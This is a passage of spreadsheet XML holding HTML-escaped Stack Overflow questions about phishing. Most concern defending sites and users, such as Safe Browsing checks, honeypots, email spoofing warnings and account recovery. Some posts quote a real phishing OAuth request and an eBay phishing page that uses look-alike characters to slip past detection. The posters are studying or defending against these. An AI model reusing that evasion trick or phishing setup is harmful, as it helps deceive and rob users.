 &lt;p&gt;Once I thought to maintain a checksums of &lt;code&gt;A_pub&lt;/code&gt; in a trusted global storage. however I am afraid wouldn't that be an over engineering ?&lt;/p&gt;
 &lt;p&gt;another way comes in my mind is to query back the origin url regarding the public key. However I want to avoid that.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;openssl&gt;&lt;public-key-encryption&gt;&lt;private-key&gt;&lt;encryption-asymmetric&gt;&lt;digest&gt;</t>
  </si>
  <si>
    <t>Need a way to identify a user if the user got incontact regarding they're account being hacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am developing a PHP application which has user accounts, I have followed best practices for security (so have done my part) - but this will obviouslly not stop accounts from being hacked.&lt;/p&gt;
 &lt;p&gt;This is just me forward thinking, but see the following scenario:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Let's say a user was silly enough to get there account hacked by
  writing down there password (which someone found - the '&lt;em&gt;hacker&lt;/em&gt;'...).&lt;/p&gt;
  &lt;p&gt;Due to the hacker getting the password, the hacker logs in and changes
  it and also changes the email.&lt;/p&gt;
  &lt;p&gt;Now the user finds out (due to them not being able to log in nor
  recover/reset their pass)...&lt;/p&gt;
  &lt;p&gt;The user then decides to report this to staff (as they want to regain control of the account).&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;How would I (a member of staff) be able to indentify the person who is reporting is the actual user, so I can help him/her?&lt;/p&gt;
 &lt;p&gt;Anyone can just give a username (and maybe email - if they know the person)...&lt;/p&gt;
 &lt;p&gt;I had an idea on maybe; a memorable word which is required to be given upon registeration (and can not be changed)...to help indentify the user.&lt;/p&gt;
 &lt;p&gt;There must be other sites which have similar procedures/functionality in place...&lt;/p&gt;
 &lt;p&gt;Your thoughts? and any example code would be nice!&lt;/p&gt;
 &lt;p&gt;PS: This is not a high security financial site, more of a social network for gamers.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;security&gt;&lt;password-recovery&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How Does PAPE Make OpenID Any More Secure?</t>
  </si>
  <si>
    <t>&lt;p&gt;I know I am missing something in reading the Provider Authentication Policy Extension spec:&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://openid.net/specs/openid-provider-authentication-policy-extension-1_0-01.html" rel="nofollow noreferrer"&gt;http://openid.net/specs/openid-provider-authentication-policy-extension-1_0-01.html&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It reads to me that you ask the Open ID Provider (OP) to perform some extra level of authentication. The OP then responds back to you telling you if it performed that authentication or not. How does this prevent, for instance, phishing at all? Can't the OP simply lie about what authentication it did or did not do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;openid&gt;</t>
  </si>
  <si>
    <t>Phishing mail Wordpress Admin</t>
  </si>
  <si>
    <t>&lt;p&gt;I received several mails from &lt;em&gt;wordpress@mydomain.tld&lt;/em&gt; inviting me to connect to my administration area to moderate comments.&lt;/p&gt;
 &lt;p&gt;Example :
  WordPress 10/21/2013 04:22:00
  A new comment on your post is waiting for your approval. 
  Comment: [...] You have new comment! Go link ... [...]
  Please visit the Administration panel:
  Sing in &lt;/p&gt;
 &lt;p&gt;Link in "Si*ng* in" redirects to a phishing page. I made several changes by changing the administration of wordpress email, but I continue to receive these messages.&lt;/p&gt;
 &lt;p&gt;I wonder if it is possible to stop sending mail &lt;strong&gt;wordpress@&lt;/strong&gt; &lt;em&gt;mydomain.tld&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wordpress&gt;&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>deceptive site ahead error on site, google console detected some urls, how those can be removed</t>
  </si>
  <si>
    <t>&lt;p&gt;please see screen shot, how those detected sample urls can be deleted, there are no such folders (/easym) in directory at all&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://ibb.co/0CpsyHr" rel="nofollow noreferrer"&gt;https://ibb.co/0CpsyHr&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;css&gt;&lt;wordpress&gt;&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How can i totally Prevent user to access my application by by passing the anti-phishing error message option</t>
  </si>
  <si>
    <t>&lt;p&gt;My application is deployed over a local intranet.I created a self signed certicated and deploy my application over https,using the this certificate.My main goal is to totally not allow users to access my application if the certificate is not install on their client pc.Currently when user try accessing the site,it display the anti-phishing error message giving option to users to continue. I want to make sure atleast clients must have the certificate otherwise should not access the site. If there is option to specify specific ip address that should access the site is also appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;asp.net&gt;&lt;security&gt;</t>
  </si>
  <si>
    <t>Phising through frames</t>
  </si>
  <si>
    <t>&lt;p&gt;My .net application uses frames. Currently there is phishing that happens through frames. Is there a way it can be controlled programmatically. Also, suggest a tool to find such phishing attacks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;frames&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>how to find zip and php files on a website ? ( phishing kit extractor)</t>
  </si>
  <si>
    <t>&lt;p&gt;im trying to make a script that will get all websites from openfish.com and extract zip and php files in the url so i can download the phishing kit and analyze it manually. Any idea how i can scan a website for zip or php files ? maybe i should use a wordlist and brute force the url ? I tried the below but it doesnt seem to be working&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;url = 'https://sec-livri-fy.net/scms/index.php'
 ext = 'php'
  def listFD(url, ext=''):
  page = requests.get(url).text
  soup = BeautifulSoup(page, 'html.parser')
  return [url + '/' + node.get('href') for node in soup.find_all('a') if node.get('href').endswith(ext)]
  for file in listFD(url, ext):
  print (file)
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;</t>
  </si>
  <si>
    <t>powershell-open .msg attachment without saving</t>
  </si>
  <si>
    <t>&lt;p&gt;I need to write a powershell script that will go through an Outlook folder, pull out a uid from a URL in the email and send a GET with the uid in a new URL.&lt;/p&gt;
 &lt;p&gt;This is fine for emails that are just forwarded to the mailbox, but sometimes these are forwarded as attachments. I would like to open the .msg file to pull out the uid in the same way, but I can't find a way to do it without saving the file down first.&lt;/p&gt;
 &lt;p&gt;My initial idea was to save the file, open it, pull out the information, then delete the .msg. The problem is that Outlook keeps the instance of the .msg file open, so it cannot be deleted. I could do an $outlook.quit(), but then it will close the instance of Outlook that I'm using to go through the rest of the emails.&lt;/p&gt;
 &lt;p&gt;I'd prefer to not have to save every single .msg individually in a file and then interate through all of them if possible.&lt;/p&gt;
 &lt;p&gt;Is it possible to just read the body of the .msg file as if it's just another email message?&lt;/p&gt;
 &lt;p&gt;Here is my code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;# Mailbox name
 $mailbox = "abuse@place.com"
 # Name of folder containing reported phishing emails
 $folderName = "SelfPhishTest"
 # Create the Outlook object to access mailboxes
 $Outlook = New-Object -ComObject Outlook.Application;
 # Grab the folder containing the emails from the phishing exercise
 $Folder = $Outlook.Session.Folders($mailbox).Folders.Item($folderName)
 # Grab the emails in the folder
 $Emails = $Folder.Items
 # Path to save attachments to
 $filepath = "C:\SavedPhishEmails\"
 # Run through each email in the folder
 foreach($email in $Emails){
  # Output Sender Name for Testing
  Write-Host $email.SenderName
  # The number of email attachments
  $intCount = $email.Attachments.Count
  # If the email has attachments, let's open the .msg email
  if($intCount -gt 0) {
  # Let's go through those attachments
  for($i=1; $i -le $intCount; $i++) {
  # The attachment being looked at
  $attachment = $email.Attachments.Item($i)
  # If this is a .msg, let's open it
  if($attachment.FileName -like "*.msg"){
  $attachmentPath = $filepath+$attachment.FileName
  $attachment.SaveAsFile($attachmentPath)
  Get-ChildItem $attachmentPath |
  ForEach-Object {
  $msg = $Outlook.Session.OpenSharedItem($_.FullName)
  $msg.Body
  }
  Remove-Item $attachmentPath
  }
  }
  }
 }
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;powershell&gt;&lt;outlook&gt;&lt;email-attachments&gt;&lt;msg&gt;</t>
  </si>
  <si>
    <t>Facebook application disabled due to suspected phishing activity. Where did I go wrong?</t>
  </si>
  <si>
    <t>&lt;p&gt;New applications need to use OAuth 2.0 &lt;/p&gt;
 &lt;p&gt;I used the code from this blog for authentication:
 &lt;a href="http://kartiklad.com/" rel="nofollow"&gt;http://kartiklad.com/&lt;/a&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; $redirect_url = 'http://url-of-site-for-canvas-app.com/authorize/';
  $oauth_url = 'https://graph.facebook.com/oauth/authorize?client_id=' . $client_id . '&amp;amp;redirect_uri=' . $redirect_url . '&amp;amp;type=user_agent&amp;amp;&amp;amp;display=' . $display . '&amp;amp;scope=' . $scope;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I created a folder called authorize and redirected the user here to exchange the session token. Then once the 'code' parameter is not empty the app code starts getting executed.&lt;/p&gt;
 &lt;p&gt;The thing is that the above code in the blog worked like a charm. My app almost got to the point where it could have gone viral. Almost 100 new users everyday and suddenly I get this notice saying it is suspected of phishing activity.&lt;/p&gt;
 &lt;p&gt;This is the official link: &lt;a href="http://developers.facebook.com/docs/authentication/" rel="nofollow"&gt;http://developers.facebook.com/docs/authentication/&lt;/a&gt; &lt;/p&gt;
 &lt;p&gt;NOTE: My app asks for user permission in the beginning and once the user logs in the result gets displayed automatically on his wall and a photo gets uploaded into the photo album. I asked for all the necessary permissions before the user got into my app. Maybe this has something to do with it? I saw another popular app doing this with no problems. &lt;/p&gt;</t>
  </si>
  <si>
    <t>user244333</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;facebook&gt;&lt;redirect&gt;</t>
  </si>
  <si>
    <t>Google Chrome thinks my site is phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I built a simple PHP website. Google says it's a phishing site. What things could I have in my PHP code that makes Google Chrome think my website is a phishing site, and how do I fix this problem? I collect the user's IP address to prevent multiple votes on a voting system I have. Could this be the problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>user520415</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;google-chrome&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>PHPMailer sending e-mails with the warning: This message may not have been sent by: foo@gmail.com Learn more Report phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using PHPMailer to send automated e-mails from my website and while testing, I noticed that all e-mails sent by php mailer are generating the following warning on the recipients end:&lt;/p&gt;
 &lt;p&gt;This message may not have been sent by: foo@gmail.com Learn more Report phishing &lt;/p&gt;
 &lt;p&gt;I was wondering if there is a way to avoid this?&lt;/p&gt;
 &lt;p&gt;PHP Mailer code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;//mail functions
 require("mailer/class.phpmailer.php");
 require("mailer/class.smtp.php");
 require("mailer/class.pop3.php");
 $mail = new PHPMailer();
 $mail-&amp;gt;IsSMTP(); 
 $mail-&amp;gt;Host = "relay-hosting.secureserver.net";
 $mail-&amp;gt;Port = 25; 
 $mail-&amp;gt;IsHTML(true);
 $mail-&amp;gt;Username = "foo@gmail.com"; // SMTP username
 $mail-&amp;gt;Password = "pass"; // SMTP password
 $mail-&amp;gt;From = "foo@gmail.com";
 $mail-&amp;gt;FromName = "FOO";
 $mail-&amp;gt;AddAddress("fOO@gmail.com", "WIDB");
 $mail-&amp;gt;AddReplyTo("foo@gmail.com");
 //$mail-&amp;gt;AddAddress("foo@gmail.com"); // name is optional
 $mail-&amp;gt;WordWrap = 50; // set word wrap to 50 characters
 //$mail-&amp;gt;AddAttachment("/var/tmp/file.tar.gz"); // add attachments
 //$mail-&amp;gt;AddAttachment("/tmp/image.jpg", "new.jpg"); // optional name
 $mail-&amp;gt;IsHTML(true); // set email format to HTML
 $mail-&amp;gt;Subject = 'Foo - Transaction Receipt';
 $mail-&amp;gt;Body = $message;
 $mail-&amp;gt;AltBody = "nothing";
 //send mail
 $mail-&amp;gt;Send();
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I am using GMail and I have SMTP enabled...&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;email&gt;&lt;phpmailer&gt;</t>
  </si>
  <si>
    <t>Dealing with URL phishing attempts</t>
  </si>
  <si>
    <t>&lt;p&gt;Been looking at the usage statistics for my website, and I keep seeing tons of attempts to access WordPress, Joomla, blogs, feeds, asp files, etc. The funny part is I do not have any of that stuff on my site, and after seeing these logs will never use them. Currently, the phishing attempts are around 30% of my site's total page hits, so I am wanting to do something about it. For almost a decade now I have used a honeypot and so I am going to start redirecting known phishing attempts to a honeypot. And maybe try to track some of the worst-offending IP addresses, and blacklist them.&lt;/p&gt;
 &lt;p&gt;To do this I figure I need a list of all the URL's that I am seeing that are not found on my site. I could create a list manually, and that would be a very long and tedious process. But if I had to guess, I'd bet someone has already done this and likely keeps it up-to-date, so why reinvent the wheel.&lt;/p&gt;
 &lt;p&gt;So is there someone who maintains a list of URL's I can use/download to detect these phishing attempts?&lt;/p&gt;
 &lt;p&gt;EDIT - Answering M A SIDDIQUI comment.&lt;/p&gt;
 &lt;p&gt;No matter what URL is used on my site you will never get a 404 error. All pages are technically created in the index.php file. My system grabs everything after the first slash (/), sanitizes it, and then parses it to determine what gets loaded. And if the page does not exist they go straight to the home page. As such all URL's are valid, to make them not valid I have to find or create a list.&lt;/p&gt;
 &lt;p&gt;I had originally thought to just redirect all non-valid URLs but there is 2 issues with that. First, while looking at the usage statistics I did see URL's that I am fairly certain where typo's. Second, The previous version of the website used some different URL's than the current version. I originally had those redirected but as I haven't seen any traffic on them in a few years, so I no longer redirect them, but I would bet a few old links are still around. All that to say, I don't want to dump real users into a honeypot. In fact I would err on the side of caution and let some URL's go over risk it being a real person.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;security&gt;&lt;url&gt;&lt;phishing&gt;&lt;honeypot&gt;</t>
  </si>
  <si>
    <t>Client-side Google OAuth 2.0 stalling out in Instagram's webview</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a working client-side javascript OAuth 2.0 package handling authentication through Google. But when I try to use it to sign up or login to my site from within an Instagram or Facebook webview, I get an infinite loading circle and a very tiny message: "One moment please..." ‚Äî&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/4VfqZ.jpg" rel="nofollow noreferrer"&gt;Screenshot of the tiny eternal loader&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Looking into the problem, I see that Google is currently encouraging developers to switch to a web-browser auth flow, which seems to be what I have ‚Äî &lt;a href="https://www.zdnet.com/article/google-bans-logins-from-embedded-browser-frameworks-to-prevent-mitm-phishing/" rel="nofollow noreferrer"&gt;https://www.zdnet.com/article/google-bans-logins-from-embedded-browser-frameworks-to-prevent-mitm-phishing/&lt;/a&gt; ‚Äî but I can't really tell what aspect is causing Insta to get stuck without throwing an error. The flow works perfectly within Twitter's webview, I should mention. It only seems to be the FB-owned platforms.&lt;/p&gt;
 &lt;p&gt;I'll include some of the front end code (React, using a "gapi-client" wrapper), because I don't think it's a backend issue. I am sending the token to my Django server to convert it eventually, but I think it's getting locked up on a redirect before that happens.&lt;/p&gt;
 &lt;p&gt;MOUNTING:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; gapi.load("client:auth2", () =&amp;gt; {
  gapi.auth2.init({client_id: "&amp;lt;CLIENT ID KEY&amp;gt;"});
  });
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;AUTHENTICATING:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;const authenticate = () =&amp;gt; {
  let gProfileObject = gapi.auth2.getAuthInstance();
  let scope = "profile email";
  return gProfileObject
  .signIn({scope: scope})
  .then((res) =&amp;gt; {
  let username, googleResponse; 
  if (res.w3) {
  googleResponse = res;
  username = res.w3.U3;
  localStorage.setItem("goog_avatar_url", googleResponse.w3.Paa);
  localStorage.setItem("goog_name", googleResponse.w3.ig);
  localStorage.setItem("goog_email", googleResponse.w3.U3);
  }
  //MOVES ON TO THE NEXT STEP IN THE SIGNUP PROCESS, COLLECTING ADDITIONAL INFORMATION FROM THE USER
  this.props.oAuthToggle(googleResponse.Zi.access_token);
  this.props.handleSpecialSubmit();
  }).catch(err =&amp;gt; {
  console.log(err)
  )
  };
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Has anyone had a similar issue with Google OAuth 2.0 on Insta or Facebook since the new changes were announced? Where did you seek a solution, and what did you need to change about your OAuth package to fix it? Thanks!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;reactjs&gt;&lt;oauth-2.0&gt;&lt;google-oauth&gt;</t>
  </si>
  <si>
    <t>Need to know what some google permissions mean</t>
  </si>
  <si>
    <t>&lt;p&gt;I was a victim of yesterday's google doc phishing attack. The email I received had a link and when clicked it asked for certain permissions. I gave access at that time but after few minutes I removed the permission from my google security page. However I am not sure what kind of permissions were given to the hacker. If I click on the link now the google page shows this message.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Error: disabled_client
 The OAuth client was disabled.
 Request Details
 client_id=946634442539-bpj9bmemdvoedu8d3or6c69am3mi71dh.apps.googleusercontent.com
 scope=https://mail.google.com/ https://www.googleapis.com/auth/contacts
 immediate=false
 include_granted_scopes=true
 response_type=token
 redirect_uri=https://googledocs.gdocs.pro/g.php
 customparam=customparam
 That‚Äôs all we know.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What kind of permissions were given to the hacker based on the above information? I am more interested in whether the hacker had access to my emails or not.&lt;/p&gt;
 &lt;p&gt;If they were able to gain access to my emails, is there a way to check whether or not they were able to successfully download my emails? I had removed the permission few minutes after giving access.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;macos&gt;&lt;email&gt;&lt;google-docs&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Website snapshot for phishing detection?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is by just looking at the webpage snapshot, is a possible way to detect website phishing? Is is accurate enough?&lt;/p&gt;
 &lt;p&gt;Is we can detect the similarity of the URL, why do we need other sophisticated techniques such as image snapshot, in order to detect phishing from the browser?&lt;/p&gt;
 &lt;p&gt;If anyone knows anything about this, care to share. Any links/resources/research about it is appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;honeypot&gt;</t>
  </si>
  <si>
    <t>Give error 404 on purpose on an existing url</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an abuse complaint from my hosting company because a spammer is sending phishing emails linking to a gif in my domain.&lt;/p&gt;
 &lt;p&gt;Unfortunately the image is linked with a thumbnails php page and I want to filter only that particular url with mod_rewrite&lt;/p&gt;
 &lt;p&gt;the url is similar to this&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.mysite.com/wp-content/themes/Broadcast/thumb.php?src=http://www.mysite.com/wp-content/uploads/year/month/image.gif&amp;amp;w=594&amp;amp;h=300&amp;amp;zc=1&amp;amp;q=100" rel="nofollow"&gt;http://www.mysite.com/wp-content/themes/Broadcast/thumb.php?src=http://www.mysite.com/wp-content/uploads/year/month/image.gif&amp;amp;w=594&amp;amp;h=300&amp;amp;zc=1&amp;amp;q=100&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;how can I give 403 or 404 to this particular url?&lt;/p&gt;
 &lt;p&gt;If I move the image file to another path the page is an error page (thumb.php) but with a 400 header.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;regex&gt;&lt;apache&gt;&lt;.htaccess&gt;&lt;mod-rewrite&gt;</t>
  </si>
  <si>
    <t>Can not automate a script to check url at phishcheck.me with Python requests</t>
  </si>
  <si>
    <t>&lt;p&gt;Thanks in advance, I am trying to automate the process of getting if a URL is phishing or not using this page (which is a must) &lt;a href="https://phishcheck.me/" rel="nofollow noreferrer"&gt;phishcheck.me&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;This is my python code:
 &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import requests
 from time import time
 import warnings
 warnings.simplefilter("ignore")
 def main():
  badurl = "google.com"
  user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36"
  user_agent +=" (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
  url = "https://phishcheck.me/submit"
  referer = 'https://phishcheck.me'
  header = {
  'Referer': referer + "/",
  'User-Agent': user_agent,
  "Origin": referer,
  "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
  "Accept": "application/json, text/javascript, */*; q=0.01",
  "Accept-Encoding": "gzip, deflate, br",
  "Accept-Language": "en-US,en;q=0.9,es;q=0.8",
  "Connection": "keep-alive",
  "Host": "phishcheck.me",
  "X-Requested-With": "XMLHttpRequest"
  }
  client = requests.session()
  client.get(referer, verify=False)
  csrftoken = client.cookies['csrftoken']
  session_id = client.cookies['sessionid']
  cookies = {
  'csrftoken': csrftoken,
  '_ga': 'GA1.2.{0}.1517235473'.format(int(time())),
  '_gid': 'GA1.2.{0}.1519059714'.format(int(time())),
  '_gat': '1',
  "sessionid": session_id
  }
  # Try 1
  payload = {
  'csrfmiddlewaretoken': csrftoken,
  'url': badurl,
  'useragent': '0'
  }
  # Try 2
  payload = "csrfmiddlewaretoken={0}&amp;amp;url={1}&amp;amp;useragent=0".format(
  csrftoken, badurl
  )
  r = client.post(url, headers=header, data=payload,
  cookies=cookies, verify=False)
  return r
 print(main().text)
 # {"is_success": false}
 print(main().cookies)
 # &amp;lt;RequestsCookieJar[&amp;lt;Cookie messages="c0fa3b2c4d55aea15b28a734768e681a2680ff7d$[[__json_message\0540\05440\054Malformed URL. Please check your entry and try again.]]" for phishcheck.me/&amp;gt;]&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The cookies is telling me that I have a Malformed URL, I am not sure about how to fix it.&lt;/p&gt;
 &lt;p&gt;Here is a screenshot about how the request is created from the phishcheck.me web page.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/HilKh.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/HilKh.png" alt="Chrome developer screenshot"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Any detail I am missing, please ask!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;python-requests&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How can I check a Model is already connected to a database, by using dd(Model)?</t>
  </si>
  <si>
    <t>&lt;p&gt;In Laravel Controller file, I have code like this&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; $WhiteListEmail = new WhiteListEmail(); 
  dd($WhiteListEmail); 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;and in chrome browser, it returns&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;^ SunnyVision\WpCustomSearch\Models\WhiteListEmail {#1021
  #connection: &amp;quot;phish&amp;quot;
  #table: &amp;quot;white_list_email&amp;quot;
  #primaryKey: &amp;quot;id&amp;quot;
  #keyType: &amp;quot;int&amp;quot;
  +incrementing: true
  #with: []
  #withCount: []
  +preventsLazyLoading: false
  #perPage: 15
  +exists: false
  +wasRecentlyCreated: false
  #attributes: []
  #original: []
  #changes: []
  #casts: []
  #classCastCache: []
  #dates: []
  #dateFormat: null
  #appends: []
  #dispatchesEvents: []
  #observables: []
  #relations: []
  #touches: []
  +timestamps: true
  #hidden: []
  #visible: []
  #fillable: array:1 [
  0 =&amp;gt; &amp;quot;email&amp;quot;
  ]
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Does
 #connection: &amp;quot;phish&amp;quot;
 describe it really connected to a database or it just represent
 I set this attribute in the model.php file?&lt;/p&gt;
 &lt;p&gt;I tried to google, but not much news on that.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;laravel&gt;</t>
  </si>
  <si>
    <t>Problem creating a new route in Gohpish tool</t>
  </si>
  <si>
    <t>&lt;p&gt;To whomever familiar with this tool &lt;a href="https://github.com/gophish/gophish" rel="nofollow noreferrer"&gt;Gophish&lt;/a&gt;, I'm trying to create a new route, to add a new feature.&lt;/p&gt;
 &lt;p&gt;The proccess to do so as i noticed from reading the code, u have to add a list item to &lt;code&gt;[nav.html][1]&lt;/code&gt;:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;li&amp;gt;
  &amp;lt;a href="/newItem"&amp;gt;newItem&amp;lt;/a&amp;gt;
 &amp;lt;/li&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Then create your html page and put it in the &lt;a href="https://github.com/gophish/gophish/tree/master/templates" rel="nofollow noreferrer"&gt;templates&lt;/a&gt; folder
 Then edit &lt;code&gt;[route.go][1]&lt;/code&gt; file with the following:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Edit &lt;code&gt;registerRoutes&lt;/code&gt; function to add this line 
 &lt;code&gt;router.HandleFunc("/newItem", mid.Use(as.newItem, mid.RequireLogin))&lt;/code&gt;
 then create &lt;code&gt;newItem&lt;/code&gt; function&lt;/li&gt;
 &lt;/ul&gt;
 &lt;pre&gt;&lt;code&gt;func (as *AdminServer) SmiShing(w http.ResponseWriter, r *http.Request) {
  params := newTemplateParams(r)
  params.Title = "NewItem"
  getTemplate(w, "newItem").ExecuteTemplate(w, "base", params)
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And this should be it. But it seems like i'm missing something&lt;/p&gt;
 &lt;p&gt;Also when i try to delete one of the exciting routes in &lt;code&gt;router.HandleFunc&lt;/code&gt; nothing changes and the route still exists when a run the tool.&lt;/p&gt;
 &lt;p&gt;So, does it have something to do with databases, or what is it that i'm missing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;go&gt;&lt;gophish&gt;</t>
  </si>
  <si>
    <t>Service to check a URL for malware or phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there a service that lets me check a URL to see if it may possibly be a dangerous site?&lt;/p&gt;
 &lt;p&gt;When a user exits our application by clicking on an untrusted link, we sent them through a "are you sure you want to leave" redirection screen. It'd be a nice touch to do a quick check to see if we should warn the user as well.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;web-services&gt;&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What are these strange characters in HTML source?</t>
  </si>
  <si>
    <t>&lt;p&gt;My friend runs a website and had an e-mail from Google Safesearch informing him he was hosting a phishing page. Turns out his cPanel was bruteforced (weak password) and they uploaded some of the pages onto his server. He told me about it and I wanted to take a look at how sophisticated are.&lt;/p&gt;
 &lt;p&gt;In many of the files, certain words/portions of text are strange. They display perfectly in a webbrowser, but are jumbled inside the HTML. I was wondering if anyone can tell me what this is?&lt;/p&gt;
 &lt;p&gt;Examples:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;title&amp;gt;W√ê¬µl√ë√ê¬æm√ê¬µ t√ê¬æ √ê¬µ√ê‚Äô√ê¬∞y: Sign in&amp;lt;/title&amp;gt;
 &amp;lt;span class="txtbox_title"&amp;gt;√ê¬†√ê¬∞ssw√ê¬ærd&amp;lt;/span&amp;gt;
 &amp;lt;a class="three" href="#"&amp;gt;F√ê¬ærg√ê¬æt y√ê¬æur 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It's also worth noting that there is normal text throughout the page that displays perfectly also.&lt;/p&gt;
 &lt;p&gt;I assume this is to stop the detection of certain words in the page, but I'm not sure. Any information would be great. &lt;/p&gt;
 &lt;p&gt;Edit: Originally was tagged as PHP. I realised that it probably shouldn't be so removed it. Be nice, kids.&lt;/p&gt;
 &lt;p&gt;Edit edit: For clarity, it's a phishing page targetting eBay users. &lt;/p&gt;
 &lt;p&gt;The examples I posted in the original post are (in order): &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;eBay: Sign In
 Your Password
 Forgot your [password]
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As such I don't believe it to be any sort of malware, but a method of encrypting text to fight detection in browsers such as Chrome (which I assume detect 'hot' words in their algorithm).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;text&gt;&lt;encoding&gt;</t>
  </si>
  <si>
    <t>How to handle redirects with the safebrowsing - api?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a website that allows others to share urls. To make sure noone enters "evil" sites I use the google safebrowsing api:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; $url = 'https://safebrowsing.googleapis.com/v4/threatMatches:find?key='.$key;
  $data = array(
  'client' =&amp;gt; array('clientId'=&amp;gt; $clientId, 'clientVersion'=&amp;gt;'0.1'),
  'threatInfo' =&amp;gt; array(
  'threatTypes'=&amp;gt;array('MALWARE', 'SOCIAL_ENGINEERING','UNWANTED_SOFTWARE'),
  'platformTypes'=&amp;gt; array('ANY_PLATFORM','ALL_PLATFORMS', 'ANDROID','WINDOWS','IOS','OSX','LINUX'),
  'threatEntryTypes'=&amp;gt; array('URL'),
  'threatEntries' =&amp;gt; array('url'=&amp;gt;$tsturl)
  ),
  );
  $data_json=json_encode($data);
  $ch=curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS,$data_json);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  $response = curl_exec($ch);
  curl_close($ch);
 &lt;/code&gt;&lt;/pre&gt;
